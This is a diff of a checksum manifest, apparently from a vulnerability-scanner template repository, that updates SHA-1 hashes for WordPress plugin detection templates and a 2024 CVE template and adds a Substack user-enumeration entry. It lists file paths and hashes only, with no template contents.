helpers/wordpress/plugins/contact-form-7-honeypot.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/contact-form-7.txt:9ed846d0f4da601ec302229b03808fcd2b2290ea +helpers/wordpress/plugins/contact-form-7.txt:df805429f6823d1d7321bcb6d64c21695e3fa92e helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 helpers/wordpress/plugins/cookie-law-info.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/cookie-notice.txt:5b3fa59c8d983303bb4380265de5153b897ee87d @@ -787,25 +787,25 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 -helpers/wordpress/plugins/elementor.txt:77bbdb08c8386b1db4a688e2f9a96dd897ebc11f +helpers/wordpress/plugins/elementor.txt:46d9b6e7bd05a9cb78d59ae12740fcd1c300f5de helpers/wordpress/plugins/elementskit-lite.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:778d773431944dd657af2fde3406d17be92f9cfe -helpers/wordpress/plugins/ewww-image-optimizer.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa +helpers/wordpress/plugins/ewww-image-optimizer.txt:356ef5627363fd1b4d41745a26ed9916eeb9fe9b helpers/wordpress/plugins/facebook-for-woocommerce.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce helpers/wordpress/plugins/fluent-smtp.txt:730bd727b3c4db45a22275182f1cbd51573c4ffe -helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd38 +helpers/wordpress/plugins/fluentform.txt:07a5fc939d521fc5aae661b0db19ad0295cc84ef helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 helpers/wordpress/plugins/formidable.txt:4c8c0a65f9f10ab6175d297b0d38cb82de78d3a8 helpers/wordpress/plugins/forminator.txt:bc78bd77fb0b7968fa063868c2ab8461de5d9da5 helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 -helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c +helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:0ff943418641a5443653f90ce6951a93e9770070 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:51e5b4744f672fbc75ac2043bb18ffd8d1d563c3 helpers/wordpress/plugins/google-listings-and-ads.txt:67c391fdae5d34abde64a1732ca064007569702b helpers/wordpress/plugins/google-site-kit.txt:3fc4f3215f2c02622f980d28a4791bcc6857a95e @@ -817,7 +817,7 @@ helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d helpers/wordpress/plugins/header-footer-elementor.txt:7a2aa38dbae06f99122c345cced2a9e98d1c22bb helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213df36 -helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc +helpers/wordpress/plugins/health-check.txt:348b6913760dfd78a9394bc38c5a8fa7528208e2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 helpers/wordpress/plugins/hostinger.txt:9d58b49dc32ab6a8591bb2ce2c9a3a4748e7f41d @@ -826,18 +826,18 @@ helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 helpers/wordpress/plugins/insert-headers-and-footers.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b132e5511e91d95bea5 +helpers/wordpress/plugins/intuitive-custom-post-order.txt:b0dcf3b058d1447f7795e1c1a95d9af3377f899d helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:0378155bec7f85b13304474a2e6dc6c7797689bc helpers/wordpress/plugins/jetpack.txt:60a854f8bf5e45303554786e4d93e54911b7eb31 -helpers/wordpress/plugins/kadence-blocks.txt:b1a299a05adb09d8c3884ba7ed81e69dd09369d8 +helpers/wordpress/plugins/kadence-blocks.txt:407ad1491f70509949c88437fdd685ac52477790 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:839a647433a9f8e27202a54029166cf00ce88b97 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4a68a369b09b39005e13232e5dfd62ba1526b55d helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:03c10c50990743199cc887aaacd3f88a0a0a026e helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 -helpers/wordpress/plugins/loginizer.txt:601d73df964f0268deb6426df6184fb9d6422d1e +helpers/wordpress/plugins/loginizer.txt:57f75e869bf26cdb7eaddcd7bb1de6cfbb0594c3 helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:6f8941ad5d1dfeb1e4d4a276b9ad1dbce8a7cc0d @@ -924,7 +924,7 @@ helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d helpers/wordpress/plugins/woocommerce-payments.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:b551dceb18411def5ed66556a7d0855f82ba865f -helpers/wordpress/plugins/woocommerce-services.txt:8e805063c85859847271163a1c51e5865e460aea +helpers/wordpress/plugins/woocommerce-services.txt:d5191657a84fc8d54327e42ccdc17707f97bfa90 helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a70 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 @@ -3520,7 +3520,7 @@ http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5217.yaml:cf2d874cba1069c15371fe16a5ede176ba0bfae7 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c -http/cves/2024/CVE-2024-5315.yaml:6faf9f7e543e47415ad0c0bccceb162b6d590489 +http/cves/2024/CVE-2024-5315.yaml:55694720bf4a9d27af050fb130c802dc0d32f924 http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 @@ -6721,6 +6721,7 @@ http/osint/user-enumeration/streamelements.yaml:6821246757af75e3baf0e83bef9e14bd http/osint/user-enumeration/streamlabs.yaml:e540d2d4a6e63bbb092523de109532f2299d62d7 http/osint/user-enumeration/stripchat.yaml:e5ffd502df3207c6f822e9650df2aba6695bf788 http/osint/user-enumeration/subscribestar.yaml:ae74f99d8abc930a482c670a9156719829fa19ed +http/osint/user-enumeration/substack.yaml:d3bac898ab8d9811336cea17bc1f2fc88156ebd6 http/osint/user-enumeration/sukebeinyaasi.yaml:b458e02523c06e5be58d63bff6f1c8df1d4e04ef http/osint/user-enumeration/suzuri.yaml:e9e7db2b37c9e89d4adf5e2760015b789f6c4d43 http/osint/user-enumeration/szmerinfo.yaml:b47d621e787d6fbf43c3ce64352b75283030b4cb @@ -7327,230 +7328,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:4489db8b4effdc5acfb2512eebd7fe8d71b9fbcf -http/technologies/wordpress/plugins/add-to-any.yaml:78cab82afd1d6d0f4c08f4907868458c9a2ce804 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:212d13144797e3fbe1a295f6c75ecbdcf9fb3982 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:494941836cdd32c55d48fb5144b4715e18bc1286 -http/technologies/wordpress/plugins/akismet.yaml:63ab994340b90872e57516e11a280a5a86696153 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:ae6088c437ae06debbae7fe3dc1041c52b2c680a -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:52d912aa5c5bd643aec4a17977d21dbb8fec7196 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:5456c1ae86c0402f7bd61cdabe18625a17f6df19 -http/technologies/wordpress/plugins/amp.yaml:f5a0e59b28b79190de7d91ed932526361e9ac305 -http/technologies/wordpress/plugins/antispam-bee.yaml:d556d5513fd9f7ec878c8b9c91c3a398aef646cc -http/technologies/wordpress/plugins/astra-sites.yaml:d67139fe1ed9dc29ed1598a62e5b72c7996e9ff9 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:c20236fe42d79e50a91660f1ad4b27e3e8870cdc -http/technologies/wordpress/plugins/backwpup.yaml:95e3728fe143867d25dbd9eb90368c7008955a97 -http/technologies/wordpress/plugins/better-search-replace.yaml:7ecaf6936d693858e68590ba740878dbac330a12 -http/technologies/wordpress/plugins/better-wp-security.yaml:1c262a34b140a6fce7891393652b58e27ee119c4 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:53c397194341a7c52e55916917fcaad6f584d46d -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:46385c610c71185dad764c8f557e0a55a334573c -http/technologies/wordpress/plugins/breeze.yaml:6636355257a3d16d9b22c2d8f3fdaaffcd349eee -http/technologies/wordpress/plugins/broken-link-checker.yaml:2bf6a599142e51a4f56ff4d1837a9bf4b228d598 -http/technologies/wordpress/plugins/chaty.yaml:e678f26d4676c240b472854228f65399b89856ee -http/technologies/wordpress/plugins/child-theme-configurator.yaml:9eb7197e6d4c0e92728941377f2c08dad572cc33 -http/technologies/wordpress/plugins/classic-editor.yaml:02a859d2552ef74c31b1415ada897107b68df442 -http/technologies/wordpress/plugins/classic-widgets.yaml:8af9bbebde46f58971b0674f80ecffff14798550 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0afa7876e0c6d43b4c1bf96b677f25c9b602b8db +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:abc91767f37a9bde49e2077246b77220dd1f57b0 -http/technologies/wordpress/plugins/coblocks.yaml:377325fbf7a0e667fb055712fdcd4e27475c4e3d -http/technologies/wordpress/plugins/code-snippets.yaml:85d6c34fe3ab25f3fa5b627561ffeb989518a0d8 -http/technologies/wordpress/plugins/coming-soon.yaml:92145d01e14c47083d14444ef44841898fd610cd -http/technologies/wordpress/plugins/complianz-gdpr.yaml:3c1504569e74bd0133f8816bb1a5ba1c12b547c1 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:781cc13ceadb65f7fda09aaa4f4a2e8f17ef4ff7 -http/technologies/wordpress/plugins/contact-form-7.yaml:ec85ed9f79435afea7d240b3fbe0e1bc70591ebb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:f8d3aaf7535abbb8c5d9d7b3269f1d18ba5dae41 -http/technologies/wordpress/plugins/cookie-law-info.yaml:3e70b0bd5eac4b065ea1e9f14c9d4e1ad68a7d6f -http/technologies/wordpress/plugins/cookie-notice.yaml:385b0904015ec683e59bbdcdadc5691b395b4595 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0de66893efe5b84c0f582f63781c78ec6f2ac59e -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:631283326bd4860e2712ce5b76178d877fb5e1fb -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:72798a3255459c88fc70f6eede053ab3d01937e3 -http/technologies/wordpress/plugins/custom-css-js.yaml:263232eda0e1bec7b6b48e8a60d42f3abe733bbe -http/technologies/wordpress/plugins/custom-fonts.yaml:85a0f1d3042d4bef97d911d1b7be9f7b1f8a693d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:344d7cf3a76c6f4e40596487bd22be5da3819f01 -http/technologies/wordpress/plugins/disable-comments.yaml:c5cc81043ae2445cca080893abf5ed0d1f901d4f -http/technologies/wordpress/plugins/disable-gutenberg.yaml:d4241f492c5468e92f364258e378aaaa97df2ec2 -http/technologies/wordpress/plugins/duplicate-page.yaml:6e7fa691bfdb6bb95240653098ea95e2be8862ef -http/technologies/wordpress/plugins/duplicate-post.yaml:a271fab75ef672e3c02438acec17a1faa7f28495 -http/technologies/wordpress/plugins/duplicator.yaml:eecf1c7590b6fed26d0f853900145a139b9091af -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d21a23a00ccd1c1e2466bc68a8b9d7b585703f18 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:a001480c6b909494fe1f4070cf6c670c139b07aa -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:eb4d9530879bc3654b5405d6c440d6c0ae4f5f63 -http/technologies/wordpress/plugins/elementor.yaml:5c4428cd82dd20fee7512bcb7a65403c571caa74 -http/technologies/wordpress/plugins/elementskit-lite.yaml:324118b50925f77f9dfa4b755c0831a732ded340 -http/technologies/wordpress/plugins/enable-media-replace.yaml:0a4c7b25660544fe42e4f28ad6cab43356a0c055 -http/technologies/wordpress/plugins/envato-elements.yaml:4511f260339ec44d2ebfed92daf3db18647c6863 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:738aedddda5cb2e7fa18caa160bfc7ee06bde6b6 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:db50ba889d1090c9c4ea0cb9948152b677b1fa3c -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:07c728a0bddef498e244f9f348dff46efdfce0e5 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:abd4fcc472f9c550c8882c654c18616ede7e11de -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:b90b2fb08c611f6c2c4e96f43e8e7d47dc79fcc4 -http/technologies/wordpress/plugins/flamingo.yaml:bf9281c26bae477784595b5acce38f623bf3cc94 -http/technologies/wordpress/plugins/fluent-smtp.yaml:95c1e75b793560d0ce4bcff3e83de7bfb6a127d9 -http/technologies/wordpress/plugins/fluentform.yaml:b893c47b50b72b57fa7206726dc3107ef4d88f76 -http/technologies/wordpress/plugins/font-awesome.yaml:6b8d1f26d0ee4a75fa16af0bd711788ac53e3d2d -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:917644c134340d29c396f53103b827ee62e64339 -http/technologies/wordpress/plugins/formidable.yaml:2f1d42f12cc1397e0dcd1caa43a41c15316ec4da -http/technologies/wordpress/plugins/forminator.yaml:67a952ebaed99e0e9e38c8c9f164048da2941d55 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:4ba8429dca38e7f6c48a3c96d4c24bfdfa47b99b -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:1cc36bfb0067bcbdcd871f77ed3961ef01f7e5b9 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:ecbb8c5160f36dc4f4fae7f79a78449b700a3063 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:b8d0ff0ad4b2b9b0e0439e2c8917a01b2be8f261 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4c53f14c8e18b42ccaef95bdf644fd2d8656a888 -http/technologies/wordpress/plugins/google-site-kit.yaml:a5b39af0c8b3bfd846fc7f14e70cbb79a546c35f -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:addfcc12021715107f14892d20c13ef547dafa58 -http/technologies/wordpress/plugins/gtranslate.yaml:9a94a7a9c090cce3354deff614d669cbeb1ad3e1 -http/technologies/wordpress/plugins/gutenberg.yaml:4025147421296355beec4e090b87a2d3a97c91e5 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:085d8523d95a70f7c4a6d21b2ffd63132875402f +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5d91ecd7b324d78250c8a96d98fbe97d6339d068 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:2625baf3437cb8c96fa1c9c3db3b58cc7940856c -http/technologies/wordpress/plugins/header-footer.yaml:173804c6453fea12920ff2af337cf62df4ce08e7 -http/technologies/wordpress/plugins/health-check.yaml:7c1fc49b7ce8d7fde256d354589dbbb9260df4c5 -http/technologies/wordpress/plugins/hello-dolly.yaml:758b804388b625430f3b996a45ff6ed9bcbcdf4d -http/technologies/wordpress/plugins/host-webfonts-local.yaml:53aadff3f5f20e38cbfb0bb8bac4350aa88b4ea8 -http/technologies/wordpress/plugins/hostinger.yaml:d0cdd5b10d913f9a2f2e00ec3e7683bdc62c8c54 -http/technologies/wordpress/plugins/image-optimization.yaml:fa1438b8c8db5d74e4f04fb210c8d2eb13699970 -http/technologies/wordpress/plugins/imagify.yaml:9c6ce2dd3b6a3280c308389767c01cd4aa108c14 -http/technologies/wordpress/plugins/imsanity.yaml:0b13781af920a3c9df16d6b5f2bd2568bc1f642b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:b14083dbec46b830277147a1a9b9ad33d39eee69 -http/technologies/wordpress/plugins/instagram-feed.yaml:efe0d898f88b20e6c971efecc911096956adec87 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:863d05216d3766176eea61cf18bcfdc9c8d063ba +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 